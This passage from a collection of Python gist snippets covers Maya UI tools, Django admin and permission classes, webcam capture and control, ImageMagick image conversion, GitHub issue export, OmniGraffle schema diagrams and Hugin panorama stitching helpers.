print "%d: %r" % (i,argset)
# sys.exit(0)
times = []
for argset in argsetlist:
print "now running %r" % argset
times.append(run_test(**argset))
# print "\t".join(map(lambda x : "%r" % x,argsetlist))
for i, run in enumerate(argsetlist):
print "run #%d: %r" % (i, run)
print "Average time per insert operation, in ms"
for i, row in enumerate(zip(*times)):
print "%d:\t%r" % (i, row)
if __name__ == "__main__":
main()
```
#### File: hard-gists/1381489/snippet.py
```python
from PyQt4 import QtCore, QtGui
import maya.cmds as cmds
import maya.OpenMayaUI as mui
import sip
class MyDialog(QtGui.QDialog):
def __init__(self, parent, **kwargs):
super(MyDialog, self).__init__(parent, **kwargs)
self.setObjectName("MyWindow")
self.resize(800, 600)
self.setWindowTitle("PyQt ModelPanel Test")
self.verticalLayout = QtGui.QVBoxLayout(self)
self.verticalLayout.setContentsMargins(0,0,0,0)
# need to set a name so it can be referenced by maya node path
self.verticalLayout.setObjectName("mainLayout")
# First use SIP to unwrap the layout into a pointer
# Then get the full path to the UI in maya as a string
layout = mui.MQtUtil.fullName(long(sip.unwrapinstance(self.verticalLayout)))
cmds.setParent(layout)
paneLayoutName = cmds.paneLayout()
# Find a pointer to the paneLayout that we just created
ptr = mui.MQtUtil.findControl(paneLayoutName)
# Wrap the pointer into a python QObject
self.paneLayout = sip.wrapinstance(long(ptr), QtCore.QObject)
self.cameraName = cmds.camera()[0]
self.modelPanelName = cmds.modelPanel("customModelPanel", label="ModelPanel Test", cam=self.cameraName)
# Find a pointer to the modelPanel that we just created
ptr = mui.MQtUtil.findControl(self.modelPanelName)
# Wrap the pointer into a python QObject
self.modelPanel = sip.wrapinstance(long(ptr), QtCore.QObject)
# add our QObject reference to the paneLayout to our layout
self.verticalLayout.addWidget(self.paneLayout)
def showEvent(self, event):
super(MyDialog, self).showEvent(event)
# maya can lag in how it repaints UI. Force it to repaint
# when we show the window.
self.modelPanel.repaint()
def show():
# get a pointer to the maya main window
ptr = mui.MQtUtil.mainWindow()
# use sip to wrap the pointer into a QObject
win = sip.wrapinstance(long(ptr), QtCore.QObject)
d = MyDialog(win)
d.show()
return d
try:
dialog.deleteLater()
except:
pass
dialog = show()
```
#### File: hard-gists/1388243/snippet.py
```python
from django.contrib import admin
class ReadOnlyModelAdmin(admin.ModelAdmin):
"""
ModelAdmin class that prevents modifications through the admin.
The changelist and the detail view work, but a 403 is returned
if one actually tries to edit an object.
Source: https://gist.github.com/aaugustin/1388243
"""
actions = None
# We cannot call super().get_fields(request, obj) because that method calls
# get_readonly_fields(request, obj), causing infinite recursion. Ditto for
# super().get_form(request, obj). So we assume the default ModelForm.
def get_readonly_fields(self, request, obj=None):
return self.fields or [f.name for f in self.model._meta.fields]
def has_add_permission(self, request):
return False
# Allow viewing objects but not actually changing them.
def has_change_permission(self, request, obj=None):
return (request.method in ['GET', 'HEAD'] and
super().has_change_permission(request, obj))
def has_delete_permission(self, request, obj=None):
return False
```
#### File: hard-gists/1410088/snippet.py
```python
import opencv
#this is important for capturing/displaying images
from opencv import highgui
import pygame
import sys
camera = highgui.cvCreateCameraCapture(0)
def get_image():
im = highgui.cvQueryFrame(camera)
# Add the line below if you need it (Ubuntu 8.04+)
im = opencv.cvGetMat(im)
#convert Ipl image to PIL image
return opencv.adaptors.Ipl2PIL(im)
fps = 30.0
pygame.init()
window = pygame.display.set_mode((640,480))
pygame.display.set_caption("Demo")
screen = pygame.display.get_surface()
while True:
events = pygame.event.get()
for event in events:
if event.type == pygame.QUIT or event.type == pygame.KEYDOWN:
sys.exit(0)
im = get_image()
pg_img = pygame.image.frombuffer(im.tostring(), im.size, im.mode)
screen.blit(pg_img, (0,0))
pygame.display.flip()
pygame.time.delay(int(1000 * 1.0/fps))
```
#### File: hard-gists/1411980/snippet.py
```python
from __future__ import division
import os
import subprocess
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
try:
from PIL import Image
except ImportError:
import Image
class ImageMagickConversion(object):
GRAVITY_CHOICES = ('northwest', 'north', 'northeast', 'west', 'center',
'east', 'southwest', 'south', 'southeast')
def __init__(self, image=None, image_path=None, output_format=None,
image_magick_path='/usr/bin/', debug=False):
if image is None and image_path is None:
raise ValueError('Either an image or image path is required.')
self.args = []
self.out_format = None
self.image = image
self.image_path = image_path
self.output_format = output_format
self.image_magick_path = image_magick_path
self.debug = debug
def _cache_image_properties(self):
try:
pil_image = Image.open(self.image or self.image_path)
except IOError:
raise ValueError("Invalid image")
self._width, self._height = pil_image.size
self._format = pil_image.format
if self.image:
# reset the image to so it can be read again if needed
self.image.reset()
@property
def width(self):
if not hasattr(self, '_width'):
self._cache_image_properties()
return self._width
@property
def height(self):
if not hasattr(self, '_height'):
self._cache_image_properties()
return self._height
@property
def format(self):
if not hasattr(self, '_format'):
self._cache_image_properties()
return self._format
def gravity(self, position):
if position.lower() not in ImageMagickConversion.GRAVITY_CHOICES:
raise ValueError("Invalid value for position.")
self.args.extend(['-gravity', position])
return self
def crop(self, width, height, left=0, top=0):
self.args.extend(['-crop', '%dx%d+%d+%d' % (width, height, left, top)])
return self
def resize(self, width, height, preserve_aspect_ratio=True,
can_enlarge=False, outer=True):
if preserve_aspect_ratio:
if outer: # image can be bigger than resize box
ratio = max(width / self.width, height / self.height)
else: # image must fit within resize box
ratio = min(width / self.width, height / self.height)
if ratio >= 1 and not can_enlarge:
return self
width = int(round(self.width * ratio))
height = int(round(self.height * ratio))
self.args.extend(['-resize', '%dx%d' % (width, height)])
return self
def quality(self, quality):
self.args.extend(['-quality', unicode(quality)])
return self
def _process_image(self, command, pre_input_args, post_input_args,
input_image_path=None, input_image=None, output_image_path=None):
# support pipe or filesystem i/o
proc_kwargs = {}
if input_image_path:
input_arg = input_image_path
else:
input_arg = '-'
proc_kwargs['stdin'] = subprocess.PIPE
if output_image_path:
output_arg = output_image_path
else:
output_arg = '-'
proc_kwargs['stdout'] = subprocess.PIPE
proc_args = [os.path.join(self.image_magick_path, command)]
proc_args.extend(pre_input_args)
proc_args.append(input_arg)
proc_args.extend(post_input_args)
if self.output_format:
proc_args.append('%s:%s' % (self.output_format, output_arg))
else:
proc_args.append(output_arg)
if self.debug:
print 'ImageMagick: %s' % ' '.join(proc_args)
proc = subprocess.Popen(proc_args, **proc_kwargs)
if input_image:
proc_input = input_image.read()
input_image.reset()
else:
proc_input = None
stdoutdata, stderrdata = proc.communicate(input=proc_input)
if stdoutdata:
new_image = StringIO()
new_image.write(stdoutdata)
return new_image
else:
return output_image_path
def convert(self, output_image_path=None):
args = ['-auto-orient']
args.extend(self.args)
return self._process_image('convert', [], args,
input_image_path=self.image_path,
input_image=self.image,
output_image_path=output_image_path
)
def watermark(self, watermark_path, opacity=40, position='southeast',
output_image_path=None):
if position.lower() not in ImageMagickConversion.GRAVITY_CHOICES:
raise ValueError("Invalid value for position.")
if output_image_path:
convert_image_path = self.convert(
output_image_path=output_image_path)
convert_image = None
else:
convert_image_path = None
convert_image = self.convert()
args = (['-dissolve', unicode(opacity), '-gravity', position,
watermark_path])
return self._process_image('composite', args, [],
input_image_path=convert_image_path,
input_image=convert_image,
output_image_path=output_image_path
)
```
#### File: hard-gists/1440754/snippet.py
```python
import csv
from github2.client import Github
# api settings for github
git_username = ''
git_api_token = ''
git_repo = ''
# csv name
csv_name = "git_hub_issues.csv"
def run_csv():
"""
Export github issues into a csv format
"""
output_csv = csv.writer(open(csv_name, 'wb'), delimiter=',')
github = Github(username=git_username, api_token=git_api_token)
# csv headers
headers = [
'id',
'title',
'body',
'state',
'creator',
'labels',
'created_at',
'updated_at',
'closed_at',
]
# write header rows
output_csv.writerow(headers)
# get the git issues and write the rows to the csv
git_issues = github.issues.list(git_repo)
for git_issue in git_issues:
print git_issue.title
labels = ' '.join(git_issue.labels)
# alot of these are blank because they are not really
# needed but if you need them just fill them out
issue = [
git_issue.number,
git_issue.title.encode('utf8'),
git_issue.body.encode('utf8'),
git_issue.state,
git_issue.user,
labels,
git_issue.created_at,
git_issue.updated_at,
git_issue.closed_at,
]
output_csv.writerow(issue)
if __name__ == '__main__':
run_csv()
```
#### File: hard-gists/1441019/snippet.py
```python
import gtk
import subprocess
## The following imports aren't needed??
#import pygtk
#import gobject
#from subprocess import *
## The full path to uvcdynctrl
UVCDYNCTRLEXEC="/usr/bin/uvcdynctrl"
## The value indicates amount of movement for panning and tilt
## Max Ranges (determined with uvcdynctrl -v -c):
## Tilt = -1920 to 1920
## Pan = -4480 to 4480
panRight = "-100"
panLeft = "100"
tiltUp = "-100"
tiltDown = "100"
## Declare the main class
class ccUVCPTZ_Main:
## Define the init script to initialize the application
def __init__(self):
## Prep the Main Window for stuff
window = gtk.Window(gtk.WINDOW_TOPLEVEL)
window.set_title("ccUVCPTZ")
window.connect("delete_event", self.hide, window)
window.connect("window-state-event", self.window_event, window)
## Create a StatusIcon for the app
statusIcon = gtk.StatusIcon()
## Let's build the menu for the StatusIcon
self.sMenu = gtk.Menu()
menuItem = gtk.ImageMenuItem(gtk.STOCK_OPEN)
menuItem.connect('activate', self.activate_window, window)
self.sMenu.append(menuItem)
menuItem = gtk.ImageMenuItem(gtk.STOCK_QUIT)
menuItem.connect('activate', self.exit, statusIcon)
self.sMenu.append(menuItem)
## Don't forget to include the icon actions itself
statusIcon.set_from_stock(gtk.STOCK_HOME)
statusIcon.set_tooltip("StatusIcon test")
statusIcon.connect('activate', self.activate_window, window)
statusIcon.connect('popup-menu', self.popup_menu, self.sMenu)
statusIcon.set_visible(True)
## Let's use a table to make a nice pretty grid for our buttons
self.table = gtk.Table(5, 3, True)
window.add(self.table)
## Time to build the buttons
# Tilt Up Button
self.tiltupBtn = gtk.Button(stock=gtk.STOCK_GO_UP)
self.tiltupBtn.connect("clicked", self.ptUp)
self.table.attach(self.tiltupBtn, 1, 2, 0, 1)
# Pan Left Button
self.panleftBtn = gtk.Button(stock=gtk.STOCK_GO_BACK)
self.panleftBtn.connect("clicked", self.ptLeft)
self.table.attach(self.panleftBtn, 0, 1, 1, 2)
# Pan/tilt Reset Button
self.resetBtn = gtk.Button(stock=gtk.STOCK_UNDO)
self.resetBtn.connect("clicked", self.ptReset)
self.table.attach(self.resetBtn, 1, 2, 1, 2)
# Pan Right Button
self.panrightBtn = gtk.Button(stock=gtk.STOCK_GO_FORWARD)
self.panrightBtn.connect("clicked", self.ptRight)
self.table.attach(self.panrightBtn, 2, 3, 1, 2)
# Tilt Down Button
self.tiltdownBtn = gtk.Button(stock=gtk.STOCK_GO_DOWN)
self.tiltdownBtn.connect("clicked", self.ptDown)
self.table.attach(self.tiltdownBtn, 1, 2, 2, 3)
# Quit Button
self.quitBtn = gtk.Button(stock=gtk.STOCK_QUIT)
self.quitBtn.connect("clicked", self.exit)
self.table.attach(self.quitBtn, 1, 2, 4, 5)
# Now display the table we built
self.table.show()
# Show the entire window
window.show_all()
## Now for the subfunctions required to actually do something for our app
# Tilt up
def ptUp(self, widget):
control = "Tilt (relative)"
value = tiltUp
result = subprocess.Popen([UVCDYNCTRLEXEC, "-s", control, "--", value]),
return True
# Pan Left
def ptLeft(self, widget):
control = "Pan (relative)"
value = panLeft
result = subprocess.Popen([UVCDYNCTRLEXEC, "-s", control, "--", value]),
return True
# Pan/Tilt Reset
def ptReset(self, widget):
control = "Pan/tilt Reset"
value = "3"
result = subprocess.Popen([UVCDYNCTRLEXEC, "-s", control, value]),
return True
# Pan Right
def ptRight(self, widget):
control = "Pan (relative)"
value = panRight
result = subprocess.Popen([UVCDYNCTRLEXEC, "-s", control, "--", value]),
return True
# Tilt Down
def ptDown(self, widget):
control = "Tilt (relative)"
value = tiltDown
result = subprocess.Popen([UVCDYNCTRLEXEC, "-s", control, "--", value]),
return True
# Quit the application completely
def exit(self, widget, data=None):
gtk.main_quit()
# Hide the window on certain events
def hide(self, widget, button, window):
if window.get_property ('visible'):
window.hide()
return window
# Detect if window was minimized and hide
def window_event(self, widget, event, window):
if event.changed_mask & gtk.gdk.WINDOW_STATE_ICONIFIED:
if event.new_window_state & gtk.gdk.WINDOW_STATE_ICONIFIED:
window.hide()
return window
# Show the popup menu
def popup_menu(self, widget, button, time, sMenu = None):
if sMenu:
sMenu.show_all()
sMenu.popup(None, None, None, 3, time)
pass
# Show the window if otherwise hidden, background, or minimized
def activate_window(self, widget, window):
if window.get_property ('visible'):
window.present()
else:
window.show_all()
window.deiconify()
## Let's call our class and load all info
ccUVCPTZ_Main()
## I don't think I need to worry about threads here??
#gtk.gdk.threads_init()
## Now let's run the init part of the script
gtk.main()#!/usr/bin/env python
########################################################
# Created by: <NAME>
# Date Modified: Jan 29, 2008
#
# Purpose: quick and dirty gui to control PTZ of my
# Logitech Quickcam Orbit AF (actually there is no zoom
# control :)
#
# To Do:
# - Modify icons and labels
# - Detect difference between click and hold for
# continued movement of cam
# - Find out what doesn't work
# - Actually learn how to code in python instead of
# hacking together other peoples code
########################################################
import gtk
import subprocess
## The following imports aren't needed??
#import pygtk
#import gobject
#from subprocess import *
## The full path to uvcdynctrl
UVCDYNCTRLEXEC="/usr/bin/uvcdynctrl"
## The value indicates amount of movement for panning and tilt
## Max Ranges (determined with uvcdynctrl -v -c):
## Tilt = -1920 to 1920
## Pan = -4480 to 4480
panRight = "-100"
panLeft = "100"
tiltUp = "-100"
tiltDown = "100"
## Declare the main class
class ccUVCPTZ_Main:
## Define the init script to initialize the application
def __init__(self):
## Prep the Main Window for stuff
window = gtk.Window(gtk.WINDOW_TOPLEVEL)
window.set_title("ccUVCPTZ")
window.connect("delete_event", self.hide, window)
window.connect("window-state-event", self.window_event, window)
## Create a StatusIcon for the app
statusIcon = gtk.StatusIcon()
## Let's build the menu for the StatusIcon
self.sMenu = gtk.Menu()
menuItem = gtk.ImageMenuItem(gtk.STOCK_OPEN)
menuItem.connect('activate', self.activate_window, window)
self.sMenu.append(menuItem)
menuItem = gtk.ImageMenuItem(gtk.STOCK_QUIT)
menuItem.connect('activate', self.exit, statusIcon)
self.sMenu.append(menuItem)
## Don't forget to include the icon actions itself
statusIcon.set_from_stock(gtk.STOCK_HOME)
statusIcon.set_tooltip("StatusIcon test")
statusIcon.connect('activate', self.activate_window, window)
statusIcon.connect('popup-menu', self.popup_menu, self.sMenu)
statusIcon.set_visible(True)
## Let's use a table to make a nice pretty grid for our buttons
self.table = gtk.Table(5, 3, True)
window.add(self.table)
## Time to build the buttons
# Tilt Up Button
self.tiltupBtn = gtk.Button(stock=gtk.STOCK_GO_UP)
self.tiltupBtn.connect("clicked", self.ptUp)
self.table.attach(self.tiltupBtn, 1, 2, 0, 1)
# Pan Left Button
self.panleftBtn = gtk.Button(stock=gtk.STOCK_GO_BACK)
self.panleftBtn.connect("clicked", self.ptLeft)
self.table.attach(self.panleftBtn, 0, 1, 1, 2)
# Pan/tilt Reset Button
self.resetBtn = gtk.Button(stock=gtk.STOCK_UNDO)
self.resetBtn.connect("clicked", self.ptReset)
self.table.attach(self.resetBtn, 1, 2, 1, 2)
# Pan Right Button
self.panrightBtn = gtk.Button(stock=gtk.STOCK_GO_FORWARD)
self.panrightBtn.connect("clicked", self.ptRight)
self.table.attach(self.panrightBtn, 2, 3, 1, 2)
# Tilt Down Button
self.tiltdownBtn = gtk.Button(stock=gtk.STOCK_GO_DOWN)
self.tiltdownBtn.connect("clicked", self.ptDown)
self.table.attach(self.tiltdownBtn, 1, 2, 2, 3)
# Quit Button
self.quitBtn = gtk.Button(stock=gtk.STOCK_QUIT)
self.quitBtn.connect("clicked", self.exit)
self.table.attach(self.quitBtn, 1, 2, 4, 5)
# Now display the table we built
self.table.show()
# Show the entire window
window.show_all()
## Now for the subfunctions required to actually do something for our app
# Tilt up
def ptUp(self, widget):
control = "Tilt (relative)"
value = tiltUp
result = subprocess.Popen([UVCDYNCTRLEXEC, "-s", control, "--", value]),
return True
# Pan Left
def ptLeft(self, widget):
control = "Pan (relative)"
value = panLeft
result = subprocess.Popen([UVCDYNCTRLEXEC, "-s", control, "--", value]),
return True
# Pan/Tilt Reset
def ptReset(self, widget):
control = "Pan/tilt Reset"
value = "3"
result = subprocess.Popen([UVCDYNCTRLEXEC, "-s", control, value]),
return True
# Pan Right
def ptRight(self, widget):
control = "Pan (relative)"
value = panRight
result = subprocess.Popen([UVCDYNCTRLEXEC, "-s", control, "--", value]),
return True
# Tilt Down
def ptDown(self, widget):
control = "Tilt (relative)"
value = tiltDown
result = subprocess.Popen([UVCDYNCTRLEXEC, "-s", control, "--", value]),
return True
# Quit the application completely
def exit(self, widget, data=None):
gtk.main_quit()
# Hide the window on certain events
def hide(self, widget, button, window):
if window.get_property ('visible'):
window.hide()
return window
# Detect if window was minimized and hide
def window_event(self, widget, event, window):
if event.changed_mask & gtk.gdk.WINDOW_STATE_ICONIFIED:
if event.new_window_state & gtk.gdk.WINDOW_STATE_ICONIFIED:
window.hide()
return window
# Show the popup menu
def popup_menu(self, widget, button, time, sMenu = None):
if sMenu:
sMenu.show_all()
sMenu.popup(None, None, None, 3, time)
pass
# Show the window if otherwise hidden, background, or minimized
def activate_window(self, widget, window):
if window.get_property ('visible'):
window.present()
else:
window.show_all()
window.deiconify()
## Let's call our class and load all info
ccUVCPTZ_Main()
## I don't think I need to worry about threads here??
#gtk.gdk.threads_init()
## Now let's run the init part of the script
gtk.main()
```
#### File: hard-gists/1486762/snippet.py
```python
import sys
import re
from appscript import *
# from pg import DB
import _mysql
import string
####################################################
# Some default settings for OmniGraffle Graphics #
####################################################
# Common to title and all types of columns.
common_props = {}
common_props[ k.shadow_vector ] = [ 7.0, 7.0 ]
common_props[ k.shadow_fuzziness ] = 17.45
common_props[ k.autosizing ] = k.full
common_props[ k.text_placement ] = k.top
common_props[ k.draws_stroke ] = False
common_props[ k.fill ] = k.linear_fill
common_props[ k.fill_color ] = [ 1, 1, 1 ]
common_props[ k.gradient_center ] = [ 0.5, 0 ]
common_props[ k.magnets ] = [ [ 1, 0 ], [ -1, 0 ] ]
#common_props[ k.size ] = [ 90, 14 ]
#Table Name
table_name = common_props.copy()
table_name[ k.gradient_color ] = [ 0, 0, 1 ]
#Primary Keys
column_pkey = common_props.copy()
column_pkey[ k.gradient_color ] = [ 1, 0, 0 ]
#Foreign Keys
column_fkey = common_props.copy()
column_fkey[ k.gradient_color ] = [ 0, 1, 0 ]
#No Key
column_norm = common_props.copy()
column_norm[ k.gradient_color ] = [ 1, 1, 1 ]
#Line Properties
line_props = {}
line_props[ k.line_type ] = k.orthogonal
line_props[ k.head_type ] = "FilledArrow"
line_props[ k.jump ] = True
###########################################
# The query used to gather schema data. #
###########################################
query = """
select c.table_name,
c.column_name,
c.data_type,
c.is_nullable,
tc.constraint_type,
kcu.referenced_table_name,
kcu.referenced_column_name,
tc.constraint_name
from information_schema.columns as c
left join
information_schema.key_column_usage as kcu
on (
c.column_name = kcu.column_name
and c.table_schema = kcu.table_schema
and c.table_name = kcu.table_name
)
left join
information_schema.table_constraints as tc
on (
tc.constraint_name = kcu.constraint_name
and tc.table_schema = kcu.table_schema
and tc.table_name = kcu.table_name
)
where c.table_schema = 'SCHEMA_NAME'
group by
c.table_name,
c.column_name
order by
c.table_name,
c.ordinal_position
"""
#########################
# Method definitions. #
#########################
def parseArguments():
"""
I haven't taken the time to learn getopt, so I use regular expressions.
"""
options[ 'graffle' ] = 'OmniGraffle 5'
options[ 'dbhost' ] = 'localhost'
options[ 'dbport' ] = 5432
options[ 'dbuser' ] = ''
options[ 'dbpass' ] = ''
options[ 'dbname' ] = ''
options[ 'schema' ] = 'public'
for key in options:
value = options[key]
print "Enter %s (%s): " % (key, value)
data = raw_input()
if data: options[key] = data
options[ 'query' ] = re.compile( 'SCHEMA_NAME' ).sub( options[ 'dbname' ].lower(), query )
#Get the information we need to draw from the database
def getSchemaInfo( options, sql_tables, sql_references ):
"""
Connect to the database and retrieve our schema information.
"""
conn = _mysql.connect(host=options[ 'dbhost' ], user=options[ 'dbuser' ], db=options[ 'dbname' ], passwd=options['dbpass'])
conn.query( options[ 'query' ] )
rows = conn.store_result()
res = rows.fetch_row(0, 1)
for i in range( len( res ) ):
ftbl = res[i][ 'table_name' ]
fcol = res[i][ 'column_name' ]
type = res[i][ 'data_type' ]
nullable = res[i][ 'is_nullable' ]
keytype = res[i][ 'constraint_type' ]
ttbl = res[i][ 'referenced_table_name' ]
tcol = res[i][ 'referenced_column_name' ]
if not sql_tables.has_key( ftbl ):
sql_tables[ ftbl ] = []
sql_tables[ ftbl ] += [ [ fcol, type, nullable, keytype ] ]
if keytype == 'FOREIGN KEY' :
sql_references += [ [ ftbl, fcol, ttbl, tcol ] ]
#Create a table in OmniGraffle from database info
def createOGTableFromSQLTable( graffle, name, sql_table, og_tables ):
"""
Create a table in OmniGraffle using data from the database
"""
shapes = []
graphics = graffle.windows[1].document.canvases[1].graphics
graphics.end.make( new=k.shape, with_properties=table_name )
shape = graphics.last.get()
shape.text.set( name )
shapes += [ shape ]
use_props = None
for i in range( len( sql_table ) ):
if sql_table[i][3] == 'PRIMARY KEY' :
use_props = column_pkey
elif sql_table[i][3] == 'FOREIGN KEY' :
use_props = column_fkey
else :
use_props = column_norm
graphics.end.make( new=k.shape, with_properties=use_props )
shape = graphics.last.get()
shape.text.set( sql_table[i][0] )
shapes += [ shape ]
og_tables[ name.upper() ] = graffle.assemble( shapes, table_shape=[len( sql_table)+1,1] )
og_tables[ name.upper() ].slide( by={ k.x:25,k.y:25} )
#Get the source and destination graphics for a line to be drawn
def getOGGraphicsFromReference( sql_reference, og_tables ) :
ftbl = og_tables[ sql_reference[0].upper() ]
fg = None
for col in ftbl.columns[1].graphics.get() :
if( col.text.get() == sql_reference[1] ) :
fg = col.get() ;
break ;
else:
raise RuntimeError, "Failed to find graphic for " + sql_reference[0] + "( " + sql_reference[1] + " )"
ttbl = og_tables[ sql_reference[2].upper() ]
tg = None
for col in ttbl.columns[1].graphics.get() :
if( col.text.get() == sql_reference[3] ) :
tg = col.get() ;
break ;
else:
raise RuntimeError, "Failed to find graphic for " + sql_reference[2] + "( " + sql_reference[3] + " )"
return [ fg, tg ]
#Draw a line representing a reference in the database.
def createOGLineFromReference( graffle, sql_reference, og_tables ) :
tgs = getOGGraphicsFromReference( sql_reference, og_tables )
tgs[0].connect( to=tgs[1], with_properties=line_props )
#####################
# Run the script. #
#####################
options = {}
sql_tables = {}
sql_references = []
og_tables = {}
parseArguments()
graffle = app( options[ 'graffle' ] )
getSchemaInfo( options, sql_tables, sql_references )
for key in sql_tables.keys() :
createOGTableFromSQLTable( graffle, key, sql_tables[ key ], og_tables )
graffle.windows[1].document.canvases[1].layout_info.properties.set( { k.type:k.force_directed} )
graffle.windows[1].document.canvases[1].layout()
for i in range( len( sql_references ) ) :
createOGLineFromReference( graffle, sql_references[ i ], og_tables )
```
#### File: hard-gists/1522bcdb5b05365c0222/snippet.py
```python
import maya.cmds as cmds
#import edgeLord
#edgeLord.run()
def run():
#get selected edgeloop
edgeLoop = cmds.ls(selection=True)
#get verticles in the edge loop
vertLoop = cmds.polyListComponentConversion(edgeLoop, fromEdge=True, toVertex=True)
#sort individual verticles into a list
vertLoop = cmds.ls(vertLoop, flatten=True)
#open undo chunk so entire operation is a single action
cmds.undoInfo(openChunk = True)
#soften the mesh normals
mesh = cmds.listRelatives(parent=1)
cmds.polySoftEdge(mesh, angle=180)
#run on each vertex on the edgeloop
for vert in vertLoop:
#unlock the normal of the vertex
cmds.polyNormalPerVertex(vert, unFreezeNormal=True)
#get the normals of the vertex on the loop
vertNormals = list(cmds.polyNormalPerVertex(vert, query=True, xyz=True))
#get only the first three vectors
vertNormals = vertNormals[:3]
# select the neighboring verticles using the declared function below
vertNeighbors(vert, vertLoop)
#set their normal angle to match the vertex on the loop
cmds.polyNormalPerVertex(xyz=vertNormals)
#reselect the edge loops
cmds.select(edgeLoop)
#close undo chunk, operation is done
cmds.undoInfo(closeChunk = True)
# function to select a vertex's perpendicular neighbors
def vertNeighbors(vert, vertLoop):
#find the verticles connected to this vertex by edges
connectedEdges = cmds.polyListComponentConversion(vert, toEdge=True)
connectedVerts = cmds.polyListComponentConversion(connectedEdges, toVertex = True)
#select the connected verticles, then deselect the verticles on the loop
cmds.select(connectedVerts, replace = True)
cmds.select(vertLoop, deselect = True)
```
#### File: hard-gists/1545255/snippet.py
```python
from django.contrib.auth.models import Group
from djangorestframework.permissions import _403_FORBIDDEN_RESPONSE, BasePermission
class GroupBasePermission(BasePermission):
group_name = ""
def check_permission(self, user):
"""
Should simply return, or raise a 403 response.
"""
try:
user.groups.get(name=self.group_name)
except Group.DoesNotExist:
raise _403_FORBIDDEN_RESPONSE
class GroupAPIGETPermission(GroupBasePermission):
"""
Checks to see if a user is in a particular group
"""
group_name = "API GET"
class GroupAPIPOSTPermission(GroupBasePermission):
"""
Checks to see if a user is in a particular group
"""
group_name = "API POST"
```
#### File: hard-gists/1551619/snippet.py
```python
import sys
import os
import shutil
import tempfile
import subprocess
import numpy as np
import cv2
import hsi
def exec_shell(cmd_line, raise_on_err=False):
""" Execute a shell statement (as a string 'cmd_line')
in a subprocess and return (stdout, stderr) results
if 'raise_on_err': raise AssertionError if something was dumped to stderr
"""
out, err = subprocess.Popen(
cmd_line,
shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE
).communicate()
assert not (raise_on_err and err), \
"Error: cmd=%s, stderr=%s" % (cmd_line, err)
return out.strip(), err.strip()
def pto_gen(img_fns, hfov=50, out_pto="project.pto"):
""" Generate a Hugin .pto project file
Parameters
----------
img_fns: list,
the (ordered) full paths to the video frames
hfov: int, optional, default: 50,
horizontal field of view in degrees
(around 50 is ok for most non-fish-eye cameras)
out_pto: string, optional, default: 'project.pto',
output path to the generated panotools .pto file
Notes
-----
Suitable as input for further tools such as the cpfind control-point generator.
Inspired from pto_gen
(http://hugin.sourceforge.net/docs/html/pto__gen_8cpp-source.html)
but with some hacks to correct the generated m-line in the header.
Uses the Hugin python scripting interface (http://wiki.panotools.org/Hugin_Scripting_Interface)
"""
# projection type: 0 == rectilinear (2 == equirectangular)
projection = 0
assert projection >= 0, "Invalid projection number (%d)" % projection
assert 1 <= hfov <= 360, "Invalid horizontal field of view (%d)" % hfov
# hugin Panorama object
pano = hsi.Panorama()
# add the images in order
for img_fn in img_fns:
src_img = hsi.SrcPanoImage(img_fn)
src_img.setProjection(projection)
src_img.setHFOV(hfov)
src_img.setExifCropFactor(1.0)
pano.addImage(src_img)
# check we added all of them
n_inserted = pano.getNrOfImages()
assert n_inserted == len(img_fns), "Didn't insert all images (%d < %d)" % \
(n_inserted, len(img_fns))
# output the .pto file
pano.writeData(hsi.ofstream(out_pto + '.tmp')) # same as pano.printPanoramaScript(...)
# some bug in header: rewrite it manually (TODO through hsi?)
with open(out_pto + '.tmp', 'r') as tmp_ff:
with open(out_pto, 'w' ) as ff:
# re-write the header
ff.write(tmp_ff.readline())
ff.write(tmp_ff.readline())
# force jpeg for the p-line
p_line = tmp_ff.readline().strip().split()
assert p_line[0] == 'p', "BUG: should be a p-line"
ff.write(' '.join(p_line[:7]) + ' n"JPEG q100"\n')
# remove extra 'f' param in the m-line
# (screws everything up if left here...)
m_line = tmp_ff.readline().strip().split()
assert m_line[0] == 'm', "BUG: should be a m-line"
ff.write(' '.join(m_line[:3]) + ' ' + ' '.join(m_line[4:]) + '\n')
# write all other lines
for l in tmp_ff.readlines():
ff.write(l)
os.remove(out_pto + '.tmp')
print "saved {0}".format(out_pto)
def get_surf_kps(img_fn, img=None, center_out=0.5,
cness_thresh=1000, min_pts=30, max_pts=300):
""" Return the opened gray-scale OpenCV image and its SURF keypoints
Points "in the middle" of the frames are left out
(center_out = proportioned of space left out).
"""
assert center_out < 1, "Too high center part to remove"
# initialize the SURF keypoint detector and descriptor
surf = cv2.SURF(cness_thresh)
# load the gray-scale image
if img is None:
img = cv2.imread(img_fn, 0)
# detect and describe SURF keypoints
cvkp, ds = surf.detect(img, None, False)
# re-arrange the data properly
ds.shape = (-1, surf.descriptorSize()) # reshape to (n_pts, desc_size)
kp = np.array([p.pt for p in cvkp])
cness = np.array([p.response for p in cvkp])
# filter out points in the middle (likely to be on the moving actor)
if center_out > 0:
rx = img.shape[1]
lb = center_out * 0.5 * rx
ub = (1 - center_out * 0.5) * rx
mask = (kp[:, 0] < lb) + (kp[:, 0] > ub)
kp = kp[mask, :]
ds = ds[mask, :]
cness = cness[mask]
# check we're within the limits
if kp.shape[0] < min_pts:
if cness_thresh > 100:
# redo the whole thing with a lower threshold
_, kp, ds = get_surf_kps(img_fn, img=img, center_out=center_out,
min_pts=min_pts, max_pts=max_pts,
cness_thresh=0.5 * cness_thresh)
else:
# we lowered the threshold too much and didn't find enough points
raise ValueError('Degenerate image (e.g. black) or too high center_out')
if kp.shape[0] > max_pts:
# too many points, take those with max cornerness only
cness_order = np.argsort(cness)[::-1]
kp = kp[cness_order[:max_pts], :]
ds = ds[cness_order[:max_pts], :]
return img, kp, ds
def get_pairwise_matches(pos1, descs1, pos2, descs2, up_to=30):
""" Get the matching local features from img1 to img2
"""
assert pos1.shape[0] * pos2.shape[0] < 1e8, \
"Too many points: increase cornerness threshold"
assert pos1.shape[0] > 10 and pos1.shape[0] > 10, \
"Not enough points: lower cornerness threshold"
# get the similarities between all descriptors
sims = np.dot(descs1, descs2.T)
# Note: in practice, using a kernel between histograms works better
# get the best matches
mi2 = sims.argmax(axis=1).squeeze()
ms = sims.max(axis=1).squeeze()
bmi1 = ms.argsort()[::-1][:up_to]
bmi2 = mi2[bmi1]
# return their positions
bp1 = pos1[bmi1]
bp2 = pos2[bmi2]
return bp1, bp2
def gen_pairwise_surf_control_points(proj_file, img_fns, display=False):
""" Use OpenCV for pairwaise image matching
cf. <opencv samples dir>/find_obj.py
"""
# get the kps of the first frame
